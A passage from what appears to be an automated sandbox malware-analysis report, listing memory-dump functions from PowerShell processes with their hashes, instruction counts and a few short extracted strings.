                                                                      • API String ID:
                                                                      • Opcode ID: beef1c8ae234616dc5e99b8d6b85fec5ba0567b05373682afb814f26bba99009
                                                                      • Instruction ID: 5995bf35a9e538060911195f6f93dbf59fb2676954fb8b43c92f025eb13061b4
                                                                      • Opcode Fuzzy Hash: beef1c8ae234616dc5e99b8d6b85fec5ba0567b05373682afb814f26bba99009
                                                                      • Instruction Fuzzy Hash: FDE0923490C28A4FCF05CB74D1558AEBFF1EF0B215B18419CDD8697312D6314C44CB40
                                                                      Function 02D9F460 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a9247863aada13034688b5d5b5c1beccaf45923405a3f1e3fc9d6882d151adf
                                                                      • Instruction ID: 6793ac2a645bda68700f7ef673d1eb1e3c45ba9612cb91e148a4c0cd5d679712
                                                                      • Opcode Fuzzy Hash: 9a9247863aada13034688b5d5b5c1beccaf45923405a3f1e3fc9d6882d151adf
                                                                      • Instruction Fuzzy Hash: F2E01A71E412069E8B80DF78C5816AAFBF0EF49200B14C5AAD948D7211E6318A42CF80
                                                                      Function 02D9F470 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction ID: 2ff15c27c8e5f7173bf125f403f85a76f96a69d9fc4dc5e212d009808b983057
                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction Fuzzy Hash: 47D067B0D042099F8B80EFADC94156EFBF4EB49200F6085AA9919E7301E7329A12CBD1
                                                                      Function 02D98748 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5bda07103c4b4ecbb1badd2cf72ea4d5b0feb61275a44c5c76b101ff35a6d93
                                                                      • Instruction ID: 0a59b33c602778c4aae86046a29a164e2f5c88ce24408e88d1b1a1b1c9034ae0
                                                                      • Opcode Fuzzy Hash: e5bda07103c4b4ecbb1badd2cf72ea4d5b0feb61275a44c5c76b101ff35a6d93
                                                                      • Instruction Fuzzy Hash: C9D01730C041098BCF48EBA4E91A4BDBB34FE10301F50016DE91B93291EB311A8ACBC0
                                                                      Function 02D98810 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9416a40bff5cd80298deb1dbcf6a552701c842810a5a154bd637e391de080265
                                                                      • Instruction ID: a7e1d3784d21382b8205b54b9ff79c039501f1c312d92acd00a18dde206fe9d9
                                                                      • Opcode Fuzzy Hash: 9416a40bff5cd80298deb1dbcf6a552701c842810a5a154bd637e391de080265
                                                                      • Instruction Fuzzy Hash: 47D01734A0820A9F8F58EFA4E54A86EBBB5EB49601F104169ED4A93340EA305C45CFC1
                                                                      Function 02D9EA57 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fdc6481af2048c4b79f83795a68a1ce1e14b2f3070c367b7d903648750af6c99
                                                                      • Instruction ID: 52dbb5f806a3430b7e3dbc3eb409c121e68c2600ec56faddfc7e955c1a953bd4
                                                                      • Opcode Fuzzy Hash: fdc6481af2048c4b79f83795a68a1ce1e14b2f3070c367b7d903648750af6c99
                                                                      • Instruction Fuzzy Hash: 28D09239A44218CFDB04CB98E895A9DF371FF84329F2081A6E51997351DB32ED52CB40
                                                                      Function 02D97932 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 167606fd296df75ac031a01034ca183a6f9638dcd73b4214c09d3786167acdbf
                                                                      • Instruction ID: 8a0af3c268656122732a8ece6e409e6fc01afd856df531bb99c0f5770981b03c
                                                                      • Opcode Fuzzy Hash: 167606fd296df75ac031a01034ca183a6f9638dcd73b4214c09d3786167acdbf
                                                                      • Instruction Fuzzy Hash: 99D0C93818D3C4AFC75B8F7994948193FB1AE1322431A05DED8E68F1B7C9268459CB06
                                                                      Function 02D97EA0 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e276c4ed1260c1280a331637baceaa98b8b267821eaa8491aaf2c5ba8de0e0a9
                                                                      • Instruction ID: 1885ea9e14e80e1b69bee1aeca8922dbcdcbc93918b578870434135b51274d7d
                                                                      • Opcode Fuzzy Hash: e276c4ed1260c1280a331637baceaa98b8b267821eaa8491aaf2c5ba8de0e0a9
                                                                      • Instruction Fuzzy Hash: 4EC04C1941F3D01EEF4B833589D9602BFB14E4352970A41CAC0D2CE4A7CE58880AC713
                                                                      Function 02D97940 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11c6d106dd2807e869280716964f71f1c11cb8e669f921e6d14720c1e760d9a1
                                                                      • Instruction ID: a61c4ee3f849d771f62eacea7b1defffaf20d2a83adc426f61533febd83e4e91
                                                                      • Opcode Fuzzy Hash: 11c6d106dd2807e869280716964f71f1c11cb8e669f921e6d14720c1e760d9a1
                                                                      • Instruction Fuzzy Hash: 1FB09231084708CFC248AF7AA4058187729BB4021538108E9E82E0A2968E36E888CB84

                                                                      Non-executed Functions

                                                                      Function 07401BE0 Relevance: 12.9, Strings: 10, Instructions: 406COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $c$j$84/k$84/k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-129371963
                                                                      • Opcode ID: 998114910ee3d8d0e23cd18ec44bfc3417512606070967806c214734018a6da5
                                                                      • Instruction ID: 410e03ccb608162157aaddac51a657aa500b11ca5a151b34d8b06dd6b7c17b22
                                                                      • Opcode Fuzzy Hash: 998114910ee3d8d0e23cd18ec44bfc3417512606070967806c214734018a6da5
                                                                      • Instruction Fuzzy Hash: 89D1F7B1B0434ACFDB258B6894046EFBBA2BFC6310F1480BBD5569B392DB719846C7D1
                                                                      Function 02D932F8 Relevance: 9.0, Strings: 7, Instructions: 213COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p$p$p$p$p$p$p
                                                                      • API String ID: 0-3363255238
                                                                      • Opcode ID: 244f5b55077f90a466a36bc956b3868ed22b650fad50c67d64eea622755310f1
                                                                      • Instruction ID: 5478f9c6bab0dff496cf79d18e4ca8c081d960796fe8b857ee88c7edce072233
                                                                      • Opcode Fuzzy Hash: 244f5b55077f90a466a36bc956b3868ed22b650fad50c67d64eea622755310f1
                                                                      • Instruction Fuzzy Hash: 8D61159681E7D15FE7035638A8752C97FB18E53058B0A02DBC4E1CF1A7E509984EC7BB
                                                                      Function 0740220A Relevance: 5.1, Strings: 4, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Tc$j$lc$j$J2k$J2k
                                                                      • API String ID: 0-582683669
                                                                      • Opcode ID: 95ff382f365ec6da637fa275a5cedd4bf07caabc2c02c1fb22fb407d23e3f7b1
                                                                      • Instruction ID: 914bafa8cafe6fa22b82503445671d0f8089b9636824b4b37795e523fe698fe6
                                                                      • Opcode Fuzzy Hash: 95ff382f365ec6da637fa275a5cedd4bf07caabc2c02c1fb22fb407d23e3f7b1
                                                                      • Instruction Fuzzy Hash: BA1104B1B083E19FE312477458247D3BFA6AFC3605B5984EBC5804F2D6C5749C42C7A5

                                                                      Executed Functions

                                                                      Function 0352B470 Relevance: .3, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ba7062ed946a3a72bf5d066d736c20f4c2ff25e04d2d2b0cc925766278261c6
                                                                      • Instruction ID: 980e5c178142e5d8c4568b7b9b3f0c006e2368014a75f6c2f02c40e842d8c64b
                                                                      • Opcode Fuzzy Hash: 7ba7062ed946a3a72bf5d066d736c20f4c2ff25e04d2d2b0cc925766278261c6
                                                                      • Instruction Fuzzy Hash: 24918D75B407189FDB15EFBA84116AE7BF2FF84700B40896DE056AF280DF3469068BE5
                                                                      Function 0352B490 Relevance: .3, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abfc3e5d9881049af628ebc57621e5a21edad651b33a7ed8670773067dc72bef
                                                                      • Instruction ID: 23dd5a085f38e9a2084c82d597be4bbb89acc02f7bafd24e63ba6a88ced40c0c
                                                                      • Opcode Fuzzy Hash: abfc3e5d9881049af628ebc57621e5a21edad651b33a7ed8670773067dc72bef
                                                                      • Instruction Fuzzy Hash: E1917C75B00718AFDB19EFBA84116AE7BF2FF84700B40895DE156AB384DF3469018BE5
                                                                      Function 07D82308 Relevance: 10.6, Strings: 8, Instructions: 639COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1783660389.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7d80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-1679444440
                                                                      • Opcode ID: 37fbcac9297a5c207a288e032a14e470e06681a1ee069e67c962cb1870650058
                                                                      • Instruction ID: e1886e7a902ec143d2154dfc14abb31c031f2c2a56621004320b26e04230e0d0
                                                                      • Opcode Fuzzy Hash: 37fbcac9297a5c207a288e032a14e470e06681a1ee069e67c962cb1870650058
                                                                      • Instruction Fuzzy Hash: E62205B1B00209DFEB54AF6988507AAF7F6BF8A310F14807AD585DB241DB35ED41CBA1
                                                                      Function 0352E610 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 9181b3dfdc8aa642ed7fd7cfcb50291074ffa40c47bd982569d99ac70799591e
                                                                      • Instruction ID: edefad0670c85accde19496ef08259be8371dd938b3a6c895e66243a19a52815
                                                                      • Opcode Fuzzy Hash: 9181b3dfdc8aa642ed7fd7cfcb50291074ffa40c47bd982569d99ac70799591e
                                                                      • Instruction Fuzzy Hash: 7341BA74A002059FCB14EFAAE894A9DBBF2FF89300F14856DD456AB391CB706D45CBA1
                                                                      Function 0352E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 61e4a0813d6fc202ff840ce832ddc329ca05dd85ce27825cad2d6d0bb99e906f
                                                                      • Instruction ID: 3630ddfdc1983cebcb4323a937cc5910467d5b1576f50c3171403b18ed489755
                                                                      • Opcode Fuzzy Hash: 61e4a0813d6fc202ff840ce832ddc329ca05dd85ce27825cad2d6d0bb99e906f
                                                                      • Instruction Fuzzy Hash: 05319A34A006159FCB14EF6AE484A9EBBF2FF89300F14852CD456AB395CB70AD45CFA0
                                                                      Function 07D83CE8 Relevance: .6, Instructions: 573COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1783660389.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7d80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00d458a06a80567176ecc2a8b1f03f0f67f10470b6280cc4946775b095115637
                                                                      • Instruction ID: ee6190ca864a8d08978ce797bb7a01ebd4c3b00bf3dde1f1e82df3bbfaa4e393
                                                                      • Opcode Fuzzy Hash: 00d458a06a80567176ecc2a8b1f03f0f67f10470b6280cc4946775b095115637
                                                                      • Instruction Fuzzy Hash: 741258B0B043568FDB65AF68D81076AFBA29FC2654F2480BAD545DF241DF35CC42CBA1
                                                                      Function 0352E7B8 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d067b6e8ac2ed5e1b812737a8e6f21f338e565e9c8fc9619407f376d77bd0687
                                                                      • Instruction ID: 2064f80ec3daf3a3f5d76a5d062cde6a129f8256297f82cb94e248a06770356d
                                                                      • Opcode Fuzzy Hash: d067b6e8ac2ed5e1b812737a8e6f21f338e565e9c8fc9619407f376d77bd0687
                                                                      • Instruction Fuzzy Hash: FC918274B002248FDB14DF69E45566DBBF6BF89610F294069E806EB3A1EF74DC41CB90
                                                                      Function 035229F0 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c54a3a9ea85ce62c7c6a428cbb76c23759e9b48cfddb97509f8446ca705db78e
                                                                      • Instruction ID: 721c90b7894a61c7ce335d5bd6c5870a55fb9378d8e11289b83a6d6ec8791a74
                                                                      • Opcode Fuzzy Hash: c54a3a9ea85ce62c7c6a428cbb76c23759e9b48cfddb97509f8446ca705db78e
                                                                      • Instruction Fuzzy Hash: EE91AD74A006059FCB15CF59C484AAEFBB1FF89310F258699D915AB3A1C736EC91CFA0
                                                                      Function 0352BAC0 Relevance: .2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3910937c24790d05b2388ddb59ead6d24ef9072877e6426a33bd2a434dc0c9e4
                                                                      • Instruction ID: 7574575ae1b02c5ad89f1304098a6a250003296b845d0a8f640e499b7ca361e1
                                                                      • Opcode Fuzzy Hash: 3910937c24790d05b2388ddb59ead6d24ef9072877e6426a33bd2a434dc0c9e4
                                                                      • Instruction Fuzzy Hash: 6A611571E012599FDB15DFA9D584B9DFBF1FF89310F18812AE809AB264EB709841CB60
                                                                      Function 0352BAB0 Relevance: .1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a1f2216d6dcf6c5336630fd0c458bffe64ac40052300f7aa46c398161495fc1e
                                                                      • Instruction ID: 0773bdcc1eda497a82dcdddd8ad41c004c90df34c9b25bf967d061230de75ee5
                                                                      • Opcode Fuzzy Hash: a1f2216d6dcf6c5336630fd0c458bffe64ac40052300f7aa46c398161495fc1e
                                                                      • Instruction Fuzzy Hash: 26511275E012599FCB15DFA9D484A9DFFF1FF89310F18802AE819AB364EB709841CB60
                                                                      Function 0352E419 Relevance: .1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87f42e3304141c26d597d6c7c746d70fb91f0d66e5efe49ec950651474391a0a
                                                                      • Instruction ID: 19ac1c8e799125057d5e1dfa590e9d37a4e5a72bb9b2e52d5d3782fa875e8ed7
                                                                      • Opcode Fuzzy Hash: 87f42e3304141c26d597d6c7c746d70fb91f0d66e5efe49ec950651474391a0a
                                                                      • Instruction Fuzzy Hash: 03416E74710315CFDB10EFA8D585A2E7BEAFFC92107498459E4498F3A1EB74DC418B91
                                                                      Function 07D83CCC Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1783660389.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7d80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdcdf2c4c0cdbe925a2cbb054292cd25441505048e14e96c5c00117f59ef0c68
                                                                      • Instruction ID: aea79518678f0cd1940afd7c2bdc7774d84c221cbe0d6db8fa83df2a67a01510
                                                                      • Opcode Fuzzy Hash: cdcdf2c4c0cdbe925a2cbb054292cd25441505048e14e96c5c00117f59ef0c68
                                                                      • Instruction Fuzzy Hash: CA413DF0B04202CFDB66AF54C5407AEFBB79F44A54F1980A6C948AF252DB35DD42CBA1
                                                                      Function 0352DFC0 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c8235882d972f57199d479c2b477fd63ee920ebd1d2da97e3df0349750b5f921
                                                                      • Instruction ID: f0882927d5ff4a3ac44536aae5797a70455303a8defac5689841215d9f2325e8
                                                                      • Opcode Fuzzy Hash: c8235882d972f57199d479c2b477fd63ee920ebd1d2da97e3df0349750b5f921
                                                                      • Instruction Fuzzy Hash: B341D135B042148FCB00DFA9E4A86ADBFF1FF89210F0844AED416EB3A5CB719841CB55
                                                                      Function 03526FC8 Relevance: .1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebbbc83ab2144c690a53dbdadd489daec6c95b4ae717bb97d4800c6a213721b
                                                                      • Instruction ID: e82dc1935ccb7fff5b5d68447716f2708d200cd463631a5a80065bac11066bd3
                                                                      • Opcode Fuzzy Hash: 2ebbbc83ab2144c690a53dbdadd489daec6c95b4ae717bb97d4800c6a213721b
                                                                      • Instruction Fuzzy Hash: 5E416A34B04214CFDB14DB65D458AAEBBF2FF8E201F184499E402AB3A2DA31DC05CF60
                                                                      Function 0352E462 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 313d45f0e7d452e36a40e1cd22301d1478ec5c187dfd98bd57e93a08c2c9fdaa
                                                                      • Instruction ID: 1881d125fb4025784134b9f83b3d4f7d3042100dfd21401752bb64f5f9334925
                                                                      • Opcode Fuzzy Hash: 313d45f0e7d452e36a40e1cd22301d1478ec5c187dfd98bd57e93a08c2c9fdaa
                                                                      • Instruction Fuzzy Hash: 6E416D74700315CFDB00EFA8D581A6DBBE6FF8921075584A8E449CF3A1EBB4EC418BA1
                                                                      Function 03522B00 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fec70667cd4ea0865b745b3082b8e7c738709e7092c69906e1a376af40e87ba9
                                                                      • Instruction ID: 62aaf4f1f4efb980fbddfb1eaf02926554a7b4464717da63ddb92d5d48cbee2d
                                                                      • Opcode Fuzzy Hash: fec70667cd4ea0865b745b3082b8e7c738709e7092c69906e1a376af40e87ba9
                                                                      • Instruction Fuzzy Hash: 28415C74A006159FCB09CF49D498AAAFBB1FF49310F158599D915AB3A4C732FC91CFA0
                                                                      Function 0352C388 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d2b84aa6bcfabda02a85c1191bc298922f6bfe88636d2582f34ed0ae5336a747
                                                                      • Instruction ID: 997f51e067c3d356455ef250690c04d7904ce8c6af2dcce91040645fdbf2c76a
                                                                      • Opcode Fuzzy Hash: d2b84aa6bcfabda02a85c1191bc298922f6bfe88636d2582f34ed0ae5336a747
                                                                      • Instruction Fuzzy Hash: 0C31BE353003019FD705EB79E844B9EB7A6FFCA621F048529D14ACB3A1DFB1A845CBA1
                                                                      Function 03527728 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 298b27719dc5d21a0ad1155fd9e2aa6869aedcd1bc901bd605abb64c625e2042
                                                                      • Instruction ID: d4cce72798ec3972f172c92b83a2bff91d216ef21c11edd169e23a4b3d92e947
                                                                      • Opcode Fuzzy Hash: 298b27719dc5d21a0ad1155fd9e2aa6869aedcd1bc901bd605abb64c625e2042
                                                                      • Instruction Fuzzy Hash: 7F315E347042159FD704DA65D844B7ABBEABFCA254F1988A9D509CB3A2EB35E801CB60
                                                                      Function 03526FC4 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 869dcb625450f44db30e8959b61cf720434d2175a47d786e7e2dc090be87536d
                                                                      • Instruction ID: 5e431fe7cc4dc798d36c3ee1f82e3877a1b548e0bac2dc10bc939b4f0171728c
                                                                      • Opcode Fuzzy Hash: 869dcb625450f44db30e8959b61cf720434d2175a47d786e7e2dc090be87536d
                                                                      • Instruction Fuzzy Hash: 91311974A10215CFDB14CFA5D558AAEBBF2BF8E215F184098E402AB3A2DB71DC45CF60
                                                                      Function 0352AE60 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
